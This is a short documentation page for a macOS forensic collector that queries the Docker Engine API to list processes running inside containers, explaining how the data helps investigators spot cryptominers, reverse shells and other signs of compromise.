Docker Processes

Overview

Evidence: Docker Processes
Description: Collect Docker Processes
Category: Applications
Platform: macos
Short Name: docktops
Is Parsed: Yes
Sent to Investigation Hub: Yes
Collect File(s): No

Background

Docker container processes show which processes are running inside each container. This data reveals the actual workload, potential process injection, privilege escalation, and unauthorized process execution within containerized environments.

Data Collected

This collector gathers structured data about docker processes.

Collection Method

This collector queries the Docker daemon via Docker Engine API to execute ‘top’ command for each container. It lists processes, PIDs, user, CPU usage, memory usage, and command line for processes running in containers.

Forensic Value

Process data within containers identifies cryptominers, reverse shells, suspicious child processes, or privilege escalation attempts. Comparing running processes against expected workload helps detect compromised containers, malware, or unauthorized access to containerized applications.